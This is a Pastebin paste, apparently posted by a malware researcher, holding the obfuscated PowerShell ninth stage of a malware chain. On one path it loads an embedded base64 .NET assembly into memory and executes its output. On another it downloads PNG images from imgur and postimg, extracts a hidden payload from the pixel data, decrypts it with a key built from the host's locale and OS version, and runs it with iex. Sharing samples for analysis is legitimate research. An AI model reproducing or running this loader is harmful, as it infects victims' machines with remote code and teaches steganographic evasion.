API tools faq
paste
Advertisement
dissectmalware

Mal Powershell - Stage 9

dissectmalware
Mar 7th, 2019
616
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PowerShell 12.57 KB | None | 0 0
raw download clone embed print report
  1. function v10A{[Reflection.Assembly]::"LoaD"([Convert]::("{4}{1}{0}{3}{2}" -f 'e6','s','ring','4St','FromBa').Invoke(("{53}{231}{186}{7}{45}{6}{120}{104}{110}{203}{242}{150}{97}{67}{125}{138}{106}{226}{94}{66}{75}{44}{123}{100}{29}{136}{92}{91}{227}{187}{207}{38}{28}{223}{146}{202}{195}{162}{85}{32}{86}{238}{51}{23}{244}{116}{77}{109}{142}{0}{73}{158}{113}{43}{181}{229}{8}{39}{166}{243}{78}{164}{211}{42}{189}{12}{232}{65}{16}{237}{141}{96}{48}{41}{222}{145}{200}{83}{132}{112}{173}{169}{205}{101}{131}{34}{127}{143}{119}{121}{52}{163}{176}{117}{107}{236}{154}{31}{126}{17}{214}{68}{212}{175}{245}{155}{124}{59}{15}{167}{219}{98}{129}{221}{63}{153}{224}{156}{64}{89}{46}{152}{159}{61}{4}{36}{47}{168}{230}{170}{135}{246}{74}{14}{19}{215}{24}{213}{115}{225}{184}{114}{165}{190}{204}{95}{69}{177}{178}{191}{82}{118}{3}{216}{9}{88}{35}{139}{37}{79}{76}{62}{209}{180}{21}{57}{102}{206}{208}{27}{241}{105}{108}{147}{10}{193}{25}{218}{161}{228}{240}{122}{84}{99}{234}{188}{239}{1}{5}{50}{217}{13}{54}{151}{144}{87}{235}{70}{233}{130}{183}{133}{49}{58}{90}{56}{2}{220}{210}{80}{196}{128}{111}{72}{81}{149}{201}{172}{55}{60}{71}{179}{140}{93}{11}{192}{30}{197}{40}{185}{137}{148}{18}{26}{198}{160}{33}{157}{199}{194}{103}{22}{182}{134}{174}{20}{171}" -f'BT5gAMAAAAAAIAiw','AAAAAAAADQ','uADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AAQIGCAMGEQwEAAAAAAQBAAAABAABAAAE6AMAAAU','mxlAFN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljAElFbnVtZXJhYmxlYDEAVG','CNAAAAFYAUwBfAFYAR','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgB','A//8AALgAAAAAAAAAQAAAAA','AigQAAAKKhswAwCIAAAABgAAEXMkAAAKCnMlAAAKCwZyAQAAcG8mAAAKcxw','gAwESEQgIBgcCEg0SIQIGD','AAAAAAAAAAAAAAAAAAAAAAAAAA','AAAAAAAAAAAAAAAAgAAAMAAAA4','AC','AkAAQAAABUAHIAYQBu','W9yeVN0c','AERlcml2YXRpb25JdGVyYXRpb25zAFRQeXIAR2VuZXJhdGUyNTZCaXRzT2ZSYW5kb21FbnRyb3B5AHBmAHNyYwBibXAAbgB','AYs','ABIQAbBDYBGQCQAD0BcQAmBEMBUQAV','AA','mVhbQBDcnlwdG9TdHJ','AAAAAAAAAAAAAAAAAAAAAAAAAA','AAAAAAA','AA','gsBxEIbwgA','yZWFtAENyeXB0b1N0cmVhbU','AAAAAAAAAAAAAAAAAAAAAAAAAAA','AAAAAAAAAAAAAAAAAAAAAAAAAAAA','GwAAAAAAP8lA','oDAAAChhdWAsrDgcYWhIFKA0AAAoYXVgLBhdYCgYeXS0eBygDAAAGCwct','ACAAUALCQAAGQ','AAAAAAAAAAAAAAAA','QCQACUAuQCQA','cxwAAAoTCBE','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AQAAAA','EtCAgDIAAFAyAADgwHCQgIDggIES','FrZQBUb0FycmF5AFNraXAAU3lzdGVtLlNlY3V','0FCAUgAQERUQUgAQERVQggAhJZHQUdBQUgAQEdBQkgAwESZRJZEWkHIAMIHQUICAQAABJxByADDh0FCAgaBw0dBR0FHQUdBRJBH','AAAAKy4HGFoSBSgLAAAKGF1YCyseBxhaEgU','AAAoMCCgnAAAKDXMEAAAGJglzKA','AAAAAAA','AdAEpnAAoAAAAAAgAMAGVxAAoAAAAAA','beKAksBglvC','8IAAAK3AYqAAEQAAACAA4ACRcA','A','AAAAAAA','9HAGdldF9CAENoYXIAVG9TdHJpbmcAQ29uY2F0AENvbnZlcnQARnJvbUJhc2U2NFN0cmluZwBTeX','yaXR5LkNyeXB0b2dyYXBoeQBSZmMyODk4RGVyaXZ','AAAg','lAA','QBSAFMASQBPAE4AXwBJAE4ARgBPAAA','AChEKFhELbyEAAAoTDN48EQksBxEJbwgAAArcEQ','AACWAH8AGgACAHghAAAAAJYAhAAgAAMAoSEAAAAAh','TVqQ','AHMAbABhAH','AAAAAA','VgBlAHIAcwBpAG8AbgAAADAALgAwAC4AMAA','AAAAAM4uAAAAIAAAAAAAAAAAAAAAAAAA','AA','JTExfV0lUSF9aRVJPUwBLZXlzaXpl','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','ZW0uTGlucQBFbnVtZXJhY','DQcHEn0SXRJdEhEODg4IAQAIAA','mFwaGljcwBGcm9tSW1hZ2UARHJhd0ltYWdlAElEaXNwb3NhYmxlAERpc3Bvc2U','EdldFBpeGVsAGdldF9SAG','gAAArcBywGB28IAAAK3','CAAAAQAAAAAQAAAASAAAAAAAAAAAAA','AAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAA','DUACAAQADoA','AAcwA6AC8ALwBpAG0AYQBnAGUAcwAyAC4AaQBtAGcAYgBvAHgALgBjAG8AbQAvAGIANwAvADAAMgAvAFoAdQBFAEkAVgBuADcAZQBfAG8','sAGUAVgBlAHIAcwBpAG8AbgAAAA','AAAAAAAAAAAAAAAAAAAA','AAAAAAAAAAAAAAAAAA','Bn8gAMAAAAAAIAYwCb/gAMAAAAAAIAUQC5CgEMAAAAABswAgAjAAAABQAAER8','GVEZWNyeXB0b3IAU3lzdGVtLklPAE1lb','AAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAFgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAA','CgEOCAABDhUSPQEO','Q','KKAUAA','QUSSRJZEl0SYR0FCA4GBwIdBRJ1BSABHQUOBgABEhESZQUgAQESEQwQAQIVEj0BHgAeAAgD','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','6XFYZNOC','AjR1VJRA','AAAAAAAAAAAA','oRBhEFCG8bAAAKEwcJ','IEQcWc','bgAAAAAAIAAAADAAC','gYgAh','dldF','UABJAEMALgBkAGwAbAAAADQACAABAFAAcgBvAGQAdQBjAHQA','AAAA','AAAAAAAAAAAAAAA','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AAAGAucnNyYwAAAJA','tAFJlcGVhdAAAAAAAX2gAdAB0AH','RBioBNAAAAgAkADldAAoAAA','AAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','F0dHJpYnV0ZQBQSUMAZ2V0X1dpZHRoAG','AAAAAAA','DALgAAAAAAAEgAAA','AJwBhQEKAKgBTQAGAMUBOgAGANkBOgAKAOYBTQAGAAcCOgAGABwCOgAOAE0CQQIGAHMCWAIGALACkwIGAMMCkwIGANgCkwIGAOgCkwI','AAAAAAAAAADAL','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','Bwcm9ncmFtIGNhbm5vdCBiZ','AAAAAAAAAAAAAAAAA','AIAAAAAAAAAAAAAAAA','QAFwAQQCxAWQAQQC7AWsASQDRASUAUQDgAXoAGQDsAX0AWQD1AYQAWQD7AYQAWQABAoQAYQAMAogAUQAVAkQACQCQACUAaQAk','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','QsBxEEbwgAAArcEQwqAAAAAUAAAAIAnwA72gAMAAAAA','SBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJU1flwAAAAAAAAAAOAAAiELAQsAABAAAAAGAAAAAAAA3i4AAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAA','AAAAAA','AAAAAAAAAAgAAAVcdAgAJCgAAAPolMwAWAAABAAAAHwAAAAUAAAAFAAAACQAAAAUAAAAqAAAABAAAAAIAAAAGAAAAAQAAAAQAAAABAAAABAAAAAAACgABAAAAAAAGAEEAOgAG','oLBwZvIwAACt4KBywGB2','Y4A','UAQ','csBxEHbwgAAArcEQYsBxEGbwgAAArcE','AAgBKQCQAFMAMQCQACUAIQBwAVgAIQB6AVgAGQC','JCLA/X38R1Qo6BgABEg0SEQUAAQ4SDQQAAQgIAyA','9ACkAUCAAAAA','TM0hVGhpcy','AlgBpABMAAQCkIAAA','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AAA','Btc2NvcmxpYgBTeXN0ZW0AT2JqZWN0AEVudW0AU3lzdGVtLkRyYXdpbmcAQml0bWFwAEltYWdlAENyZWF0ZU5vbkluZGV4ZWRJbWFnZQBCaWFkAHJldmVyc2VCaXRzAC5jdG9yAHZhbHVlX18ASElESU5HAEZ','EgAAAAAAAAAAAAA','CUA+QAOBD','AAAQABAAAAEAASABgABQABAAEAAwEAAB8AAAAJAAEABQAAABAAJQAYAAUABAAFAAEAEAArABgABQAGAAgABgaWACkAVoCeACwAVoClAC','AAA','dldF9IZWlnaHQAU3lzdGVtLkRy','MAAuADAALgAwAC4AMAAAADAACAABAEkAbgB0AGUA','GAAkDkwIGAB0DkwIGADUDkwIGAGADVgMGAG0DkwIGAHoDVgMGAIEDkwIGAJIDOgAGAK4DogMGAMoDkwIGAOMDkwISAAQE+QMAAAAA','AAANAIAACUAQAAI0Jsb2I','5AHIAaQBnAGgAdAAAACAAAAA4AAgAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQB','AAAAAAAAAAAAAAAAA','zZX','KAAABAAA','AAAA','AC50ZXh0AAAA5A4AAAAgAAAAEAAAA','0IAwgEBwIICAUAAR0FDhAQAQIVEj0BHgAVEj0BHgAIAwoBBQwQAQEdHgAVEj0BHgAHIAMBDh0FCAUgAR','AAAAAAAAAAAAAAAAAAAAAA','gZvCAAACtw','AIAkw','wAUYC1ACkAUYC','AAQAwADAAMAAwADAANABiADAAAAAsAAIAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8A','AdjQuMC4zMDMxOQAAAAAFAGwAAAC8AwAAI34AACgEAAAwBAAAI1N0cmluZ3MAAAAAWAgAAGgAAAAj','XWBMGEQYZMoYRBBdYEwQRBAJvAwAACj9j////CRdYDQkCbwQAAAo/S////','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AAAAAAAAAAAAAAAA','ABAAAAAAAAAAAAAAAJAuAABLAAAAAEAAAJACAAA','QAaQBvAG4AAAAAAAAAsASUAQAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAABwAQA','N','AU3RyaW5nAEV','s4AkQCQACUAmQD7AlMAmQAUA9QAmQApA9oAmQBGA+AAuQCQAOkAwQCQAO8AyQCXA/kAyQCcAyUA4QC3AwEB4QDAAwYB6QCQACUA8QDPAukA+','UAEAAAA8TW9kdWxlPgBQSUMuZGxsAFNUcG9rAFN0ZWZhbgBTdGF0ZQBDaGlpRQBnYXZibw','R5AENvbG9yA','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','gjRsAAAEKcyIAAA','0ZW0uQ29yZQBTeXN0','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AAAAAA','EGIAABAABvGAAAChEGF28ZAAAKEQYYbxoAAA','hiQACUABACsIQAAAACWANIARAAEABQjAAAAAJEA1wBKAAYAVCMAAAAAhhiQACUABgBcIwAAAACWAPYATwAGACQkAAAAAIYYk','AYTB','EdldFN0cmluZwBSTkdDcnlwdG9TZXJ2aWNlUHJvdmlkZXIAUmFuZG','AACigCAAAGEwQRBHJhAABwHwoo','UVHZ2AExpbW1hAFN5c3RlbS5SdW50aW1lLkNvb','lQn','gAKAFwATQAKAGMATQAGAC4BDgEG','AR2V0Qnl0ZXMAUmlqbmRhZWxNYW5hZ2VkAFN5bW1ldHJpY0FsZ29yaXRobQB','AAA','A','AEgAO','AAAAA','AAAAAAAAAAAAAAEAMQAAAAAABAAAAAA','AAlAAYAAAABAPkAAAABAP0AAAABAAEBAAABAAMBAAAC','ALgBwAG4AZwAAAzAAAAAAAINXYiCZvsFJ','kOwV','AAAAAAAAAAAAAAAAAAA','GNlcHRpb25UaHJvd3MBALguA','CgAA','AAAAAAAA','cgBuAGEAbABOAGEAbQBlAAAAUABJAEMALgBkAGwAbAAAACgAAgABAEwAZQBnAGEAbABDAG8AcAB','l0ZQBSZWFkAENsb3NlAFN5c3RlbS5UZXh0AEVuY29kaW5nAGdldF9VVE','AAAAAAAAAAAAAAAAAAAAAA','AAAEAAA','AAAAAAAAAAAAAAAAAAAABswBAA1AAAAAQAAEQJvAwAACgJvBAAACiAKICYAcwUAAAoKBigGAAAKCwcCFhZvBwAACt4KBywGB28IAAAK3AYqAAAAARAAAAIAHgALKQAKAAAAABMwAwDIAAAAAgAAERYKFgt+CQAACgwWDTipAAAAFhMEOJAAAAA','BAAEAAAAwAACA','AA','9','h6o+/0EACLd','D4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','CGFsQAAcXWAsHHjLrBioeAigQAAAKKgAAABswBAAZAQAABAAAEQIoEQAACgoGHyAoAQAAKygCAAArCwYfICgDAAArHyAoAQAAKygCAAArDAYfQCgDAAArBo5pH0BZKAEAACsoAgAAKw0DByDoAwAAcxUAAAoTBBEEHyBvFgAAChMFcxcAAAoTBh','AAAAAAAAAAAAAAAAAAAAAAAA','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AAAAAAAAAAAAAAAAAAAAAAAAAA','VVMAwAgAABAAAA','AAAAAAAAAAAAAAAA','wgqEzADAB0AAAADAAARFgoWCysRBhhaAhhdWAo','B','tTnVtYmVyR2VuZXJhdG9yAFN5c3RlbS5OZXQAV2ViQ2xpZW50AERvd25sb2FkRGF0YQBGcm9tU3RyZWF','AE4BDgEK','gAAAAAAAAAAX','CEQQJbwoAAAoTBRYTBit1BhldEwgRCEUDAAAAAgAAABIAAAAi','0NvckRsbE1haW4AbXNjb3JlZS5kb','AAAAAeAQABAFQCFldyYXBOb25Fe','AAAAAAAAAAAAAAAAAAAAAAAA','QdvHwAAChEFEw','CAAUAD8ALgALAGsBLgATAHQBcwCMAJkADgEpAV0BBIAAAAAAAAAAAAAAAAAAAAAAbAEAAAQA','1vZG','AlQBCAAIADAACAAMA','lYW0AU3R','AAg4ODgQAAB0FAwAADgQgAQEIAyAACAcgAwEICBEdBgABEiESEQc','AAAC9BO/+AAABAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAA','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','XBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eU','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','YXdpbmcuSW1hZ2luZwBQaXhlbEZvcm1hdABHc','gAGAHV7AAoAAAAAHgIoEAAACipCU0pCAQABAAAAAAAMAAA','AggqB9ETBwgSBygOAAAKKA8AAAoMEQY','tcH','n','AAC','AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA','AAAAAAAAAAAAAAA','AAAe','l0ZXMARGVyaXZlQnl0ZXM','AAMA','twILAYIbw','AA','AAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAA','AABAEYAaQB','Ap4AcQCBAqQAcQCGArkAcQCOAqQAgQCQAMYAiQDPA','B','x0AAAoTCQmOaY0bAAABEwoRCREKFhEKjmlvHgAAChMLEQhvHwAAChEJbx8AAAooIAA','AAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWEAAADQCAAAAA','AAAAAAAAAAAAAAAAA','CAAEAAAAAAAAAAAAAAA','AAAAAAEAAAEAAAAAAA','BAAAKygqAAA','AArcEQ','AAAAAAAAACgBNAAAAAAAEAAAAAAAAAAAAAAABADUCAAAAAAQAAAAAAAAAAAAAAAEAOgAAAAAAAwACACUAtQAnALUAKQC1AFMA','RfQmxvY2tTaXplAENpcGhlck1vZGUAc2V0X01vZGUAUGFkZGluZ01vZGUAc2V0X1BhZGRpbmcASUNyeXB0b1RyYW5zZm9ybQBDcmVhd'))) | OUt-nUll;${GgG}=[Stefan.gavbo]::('pf').Invoke();ieX(${gGg})};
  2. function v6B{
  3.     [Reflection.Assembly]::("LoadWithPartialName").Invoke("System.Security") | OuT-NuLl;sAL ('DF') New-Object;
  4.     add-Type -AssemblyName "System.Drawing";
  5.     ${REGeX} = [regex]"\((.+)\)";
  6.     function NICE
  7.     {
  8.     param ([String]${daYh}, [String]${coLSS})
  9.     ${nYY} = [Convert]::("FromBase64String").Invoke(${DAYH});
  10.     ${LG} = DF "System.Security.Cryptography.RijndaelManaged";
  11.     ${lg}."MODE" = [System.Security.Cryptography.CipherMode]::"cBC";
  12.     ${lg}."PAdDiNg" = [System.Security.Cryptography.PaddingMode]::"zEROS";
  13.     ${fW} = dF (Byte[])(32);
  14.     [Array]::("Copy").Invoke(${nyY}, 0, ${fW}, 0, 32);
  15.     ${HE} = DF ("System.Security.Cryptography.Rfc2898DeriveBytes")(${coLSs},${fW});
  16.     ${dCz} = ${hE}.(GetBytes).Invoke(32);
  17.     ${DEfs} = ${He}.(GetBytes).Invoke(16);
  18.     ${HMAC} = dF ("System.Security.Cryptography.HMACSHA1")(,${HE}.("{1}{0}"-f'Bytes','Get').Invoke(20));
  19.     ${eedEr} = ${hmaC}."cOmPuteHAsH"(${NyY}, 52, ${nYy}."LENgTH" - 52);
  20.     ${fAs} = ${Lg}.("CreateDecryptor").Invoke(${dcz}, ${DEFS});
  21.     ${JMA} = ${fAs}.("TransformFinalBlock").Invoke(${NyY}, 52, ${nYY}."leNgTH" - 52);
  22.     ${DAm} = dF ("System.IO.MemoryStream")(${JmA}, ${fALsE});
  23.     if (${JMA}[0] -eq 0x1f) {${DAm} = dF ("System.IO.Compression.GZipStream")(${dAM}, [IO.Compression.CompressionMode]::"DeCOMpreSs")}
  24.     ${StrEAmREaDER} = dF ("System.IO.StreamReader")(${dAM}, ${TrUE});
  25.     ${StREamREADEr}.("{0}{2}{1}" -f 'Re','ToEnd','ad').Invoke()
  26.     };
  27.  
  28.     Function Vn(${CiU}){${bCZA}  = [System.Convert]::("FromBase64String").Invoke(${cIU});${HFS} = [System.Text.Encoding]::"UTf8"."geTSTRiNg"(${bCza});return ${HFs}};
  29.  
  30.     ${tmp}=(("https://i.postimg.cc/kn50Ph3h/6A.png?dl=1"),("https://i.imgur.com/wRli0qz.png"));
  31.    
  32.     foreach(${uRL} in ${tmp}){# downbload
  33.         ${Ry} = [System.Net.WebRequest]::("Create").Invoke(${uRL});
  34.         ${ry}."mEthoD" = ("{1}{0}" -f 'EAD','H');${rA} = ${rY}.(GetResponse).Invoke();
  35.         ${Ff}=${RA}."ConTEnTLeNgTH";
  36.         if (${fF} -ge 55555){# extract code from picture
  37.             ${G}=DF ("System.Drawing.Bitmap")((DF ("Net.WebClient").("OpenRead").Invoke(${uRl}));
  38.             ${O}=Df ("Byte[]") 217000;(0..433)|%{foreach(${x} in(0..499)){${P}=${G}.(GetPixel).Invoke(${x},${_});${o}[${_}*500+${x}]=([math]::("Floor").Invoke((${p}."B"-band15)*16)-bor(${p}."g" -band 15))}};
  39.             ${ecHO1}=[System.Text.Encoding]::"uTF8"."GeTsTriNG"(${O}[0..216623]);
  40.             ${pUI} = ${reGEX}.("match").Invoke((get-cUlTURE)."eNGLISHNAmE")."grOupS"[1]."vAlUe"+""+[Environment]::"osvERSiON"."VersIon"."MaJOR";
  41.             ${JAA} = nIcE -Dayh ${EchO1} -Colss ${pUI};
  42.             ${uY}=VN(${JAa});iex(${uY});break
  43.         }
  44.     }
  45. };
  46. if ([environment]::"OsVERsION"."VERsion"."mAJOr" -eq 6){V6b}else{v10A}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!